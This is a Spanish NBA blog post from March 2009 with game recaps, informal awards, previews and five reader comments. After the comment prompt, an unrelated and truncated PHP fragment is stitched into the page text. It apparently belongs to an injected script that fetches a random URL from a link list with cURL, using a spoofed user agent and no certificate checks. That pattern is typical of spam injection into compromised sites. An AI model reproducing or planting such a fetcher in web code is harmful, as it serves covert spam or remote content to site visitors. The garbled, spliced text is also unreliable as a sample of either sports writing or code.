La Crónica (20/03/2009)

21 de March de 2009 por Jabho

La noche de ayer enfrentaba en el partido que destacábamos a dos campeones en aparentes horas bajas. El Celtics@Spurs fue un partido intenso, con sabor a Play Offs y de reivindicación sobre todo por parte de los verdes, que fueron los que ganaron. Se llevaron una victoria importante, en una cancha difícil y lo hicieron con la defensa que les llevó a ganar el año pasado. Este es el camino. Además Moore jugó sus minutos como se espera de él, con intesidad en el rebote y haciéndolo fácil en ataque. Y Marbury, más allá de lo que dice el box score, se le notó que aunque no tiene ritmo de competición su actitud es adecuada y poco a poco va aportando… Los Spurs demostraron porqué ellos mismos piensan que el factor X es Ginobilli. Con Manu en pista difícilmente se les hubiera ido este partido en los últimos instantes. Aun así fueron 6 tiros libres fallados en el último minuto lo que les costó el partido. Ambos jugaron bien y ambos tienen pinta de que estarán mejor dentro de un mes. Ya no parten con la vitola de máximos favoritos pero mucho ojo con ellos. Yo sigo apostando que veremos a los Spurs en la final.

A estas alturas de la liga con unos 13-15 partidos por disputar, aunque algunas cosas ya está claras, hay clasificaciones importantes por decidir en ambas conferencias y muchos equipos implicados en la lucha.

En el Oeste están cerrados los 8 equipos de Play Offs y también sabemos que los Lakers serán primeros. A partir de ahí cualquier cosa es posible. Evitar a los Lakers o tener ventaja de campo en un par de eliminatorias se antoja vital. En ello están los otros 7 equipos que ayer, salvo los Spurs, apretaron los machos y ganaron sus partidos ante rivales teóricamente asequibles. Un  par de victorias te llevan del 3º al 7º si darte ni cuenta.

Así los Mavericks vencieron a los Pacers en el último segundo con un fade away ganador de Dirk. Pintan a octavos pero están cerca. Aún no han contado con el cuarteto Kidd-Terry-Howard-Nowiztki sano y en buena forma en todo el año y caso de conseguirlo en Abril serán peligrosos. También ganaron los Hornets a los Grizzilies en la octava victoria consecutiva de Paul y los suyos. Otro que no mencionamos mucho como posible MVP es CP3 pero como su equipo acabe 2º del Oeste veremos. Aun así siguen dejándonos un pequeño poso de decepción y es que su temporada pasada y su serie contra los Spurs hizo que esperáramos mucho de ellos cara a este año. Por cierto, que largo se le está haciendo el año a OJ Mayo ¿no? También ganaron los Jazz a los Thunder, Denver a los Wizards y los Rockets a unos Wolves donde en ausencia de Al Jefferson, Love aprovecha sus minutos para jugar mejor cada día.

En el Este lo que está decidido es que los Cavs ganarán la conferencia y poco más. Quien más y quien menos anda metido en alguna lucha por una posición arriba o abajo y varios, hasta 5 equipos, podrían optar por las plazas 7ª y 8ª que dan derecho a jugar Play Offs. Anoche, algunos se despidieron de la lucha y otros pinta que pelearán hasta el último momento.

Los Pacers como ya hemos dicho perdieron y dejaron las pocas esperanzas que tenían de clasificarse. También perdieron en su casa y ante los Kings, últimos de la liga, los Knicks. Se les ha hecho larga la temporada a los chicos de D´Antoni pero han estado ahí casi hasta el final cuando nadie contaba con ellos. Ganaron los Bobcats de Larry Brown a los Raptors y van 3 victorias seguidas (y 7 de los últimos 10). Amenazan seriamente a los Bulls y a  ver quién discute sus decisiones viniendo de donde vienen. A Diaw quién le ha visto y quién le ve. Otro que se resiste a bajarse del carro son los Nets que ganaron a  unos Heat donde reaparecía Wade… Apuntábamos a Carter que no estuvo mal aunque tampoco súper, pero ganaron que es lo que cuenta. Por último también vencieron los Pistons a los Clippers lo que parece normal, pero es que lo hicieron sin Hamilton ni Sheed y ahora los Clippers han recuperado a sus lesionados. McDyess jugón!!!!!!

Cerramos la jornada con la victoria de los Warriors ante los Sixers. No les vale de nada a los Warriors pero que no se duerman mucho en Philadelphia por si acaso.

PREMIOS

MVP: Dan ganas de dárselo a McDyees que hizo meéitos, como también el duo Diaw-Wallace, Paul o Kevin Martin. El premio va para JR Smith con sus 40 puntos, 5 rebotes y 3 asistencias.

Rookie: Ya hemos dicho en muchas ocasiones que está es una gran generación. Por calidad y por cantidad. Anoche estuvieron bien Beasley, Lopez y Douglas-Roberts en el Heat-Nets, Gordon con los Clippers, Westbrook con los Thunder, McGee con los Wizars, Morrow con los Warriors y Love con los Wolves. Pero el premio  se lo lleva Jason Thompson que ganó en el Madison con los Kings contribuyendo con 18 puntos y 12 rebotes.

Sorpresa: La de Douglas-Roberts entre los novatos o Brandan Wright y Will Bynum  entre los sophmores. Pero me quedo con 2 que apuntaban mucho y se han quedado en poco: Kwame Brown, que tuvo sólidos minutos como titular en los Pistons, y Chris Andersen y su completo partido con Denver.

Decepción: Pedazo de campaña la de un David Lee del que seguiremos hablando, y mucho, en ek futuro. Pero anoche tuvo un mal partido con sus Knicks y vio como se esfumaban las posibilidades de Play Offs. Marion “quiero el máximo este verano” anduvo cerca, cerca.

El mayor esfuerzo en vano: Bosh con Toronto… aunque más le valía haberse esforzado más hace un tiempo. Empezó como un tiro y su peor momento, acompañado de la lesión de Calderon, enterró a los Raptors.

RAZONES PARA TRASNOCHAR

El primer puesto de la liga está en juego y relacionado con la pregunta del día destacamos:

Hawks@Cavs: A las 18:00 hora española los Cavaliers reciben a un equipo en fase creciente (7 victorias seguidas) con el que en teoría se medirían en la 2ª ronda. Mejor dejar claro quién manda para que no haya malentendidos ¿no?

Lakers@Bulls: Gira por el Este de los angelinos y parada en casa de unos Bulls que encadenan 3 victorias consecutivas y necesitan ganar para seguir en puestos de Play Offs. Parece que a Bynum le falta un mes más así que de momento los Lakers son los que son.

El jugador a seguir es… Pau Gasol. Pau está en el mejor momento de su carrera. En lo personal jugando mejor que nunca y con los Lakers inmersos en la lucha por ser primeros. Hay voces que dicen que los Lakers, y él en especial, parecen un poco cansados. Seguro que sí, como todos a estas alturas más o menos, pero Gasol está ahora en una situación donde seguro que soñó estar y no parece el momento de tomarse un respiro. Cansado o no, en Marzo promedia 21,8 puntos, 9,2 rebotes y 2,6 asistencias con un tremendo 63% de tiro.

LA PREGUNTA DEL DÍA

Dice Popovich que la ventaja de campo es lo de menos, que lo importante es llegar bien. Si hay que elegir entre ambos está claro que es más importante llegar bien. Pero parece el consuelo del segundo ya que pinta mejor llegar bien y tener ventaja de campo ¿no? Aun así creo que la ventaja de campo significa más para equipos como Cavs o incluso Lakers que para unos Spurs o Celtics que vienen de ganar y confían más en sus posibilidades. La cosa es, si fuerais entrenadores de Cavs y Lakers, con el primer puesto de la conferencia más o menos asegurado ¿empezaríais a dar descanso a los Kobe, Lebron o Pau? ¿Mejor ganar la liga y llegar “calientes” a Play Offs?

Comenta

5 comentarios a esta entrada

  1. Miguel dice:
    #1

    Yo creo que tanto Lakers como Cavs deberían ya bajar revoluciones y reservar jugadores para playoffs, tienen la ventaja de campo en su Conferencia casi asegurada y de las ultimas 14 finales solo 1 se ha decidido en el último partido.

      Citar

  2. TheDeerHunter dice:
    #2

    Creo que el análisis que haces es acertado, Jabho… es más importante el factor cancha para cualquiera que no sea Celtics y San Antonio que para estos dos. Pero asímismo veo más importante esa ventaja para Cleveland que para Lakers en una hipotética final pero también les veo menos necesitados de un descanso físico como a LA.
    En la línea que dice Popovic que es más importante llegar bien que con ventaja campo también estoy en la línea que los Lakers cambiarían una desventaja campo en la final o en la final de conferencia por tener disponible a Bynum al 100%, pero por ese preciso motivo ahora resuta prioritario quedar lo más alto posible.
    No obstante, si la primera se complica como así parece que va a ser dudo mucho que se maten para pillarla.
    No tanto así Boston. Si LA no cuenta con Bynum ni con ventaja campo contra Boston lo veo bastante chungo en una hipotética final. Por lo tanto, estoy seguro que se dejaran la piel para quedar por encima… cueste lo que cueste. (lo mismo opino con respecto a SA aunque en ese caso lo doy ya por hecho)

      Citar

  3. TheDeerHunter dice:
    #3

    Por cierto… lo de Bynum y el mes que falta para su regreso es un tema que tiene muchas lecturas posibles.
    La primera es que es Phil Jackson quien se ha destapado con esas declaraciones… y eso que hace no mucho más de una semana dijo que en ningún caso hablaría más del tema hasta Abril. Todos le conocemos bastante… y lo cierto es que nunca logramos desentrañar si viene o va, ni qué tipo de trucos psicológicos va a utilizar para desinformar a los rivales.

    Confiando ciegamente en la literalidad de sus palabras (y eso es confiar mucho) no podemos saber qué causas ofrecen ese “retraso”. Ojo a las comillas, pues lo que ha dicho es que no jugará antes de playoffs. Si nos atenemos a los antecedentes la cosa pinta muy mal… pero si nos centramos objetivamente en el asunto, tal y como están las cosas tampoco tiene mucho sentido que vuelva en partidos “amistosos” del final de la regular. Además, ya conocemos que Tio Phil no acostumbra demasiado a los regresos inmediatos y prefiere dar un plazo de rodaje físico/táctico antes de la reinserción efectiva.

    En definitiva… que no tengo ni puñetera idea de cuando volverá Bynum… y las declaraciones de Jackson tampoco pueden ayudar a despejar dudas en ningún sentido.
    Eso sí, sí me creo que no volverá antes de playoffs… a lo único que me puedo agarrar de que lo haga en playoffs es a la esperanza. Pero si con todo no vuelve esto es lo que hay para los amarillos… y no es precísamente malo el panorama.

      Citar

  4. Viva_Dirk dice:
    #4

    El Celtics-Spurs fue un tostón infumable, mira que puse interes pero me quede absolutamente dormido al final del tercer cuarto.

      Citar

  5. Jabho dice:
    #5

    Cuestión de gustos. Yo prefiero un partido así de disputado a uno de los Warriors por ejemplo. Les faltó acierto, que duda cabe, pero fue un partido duro y con alternativas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>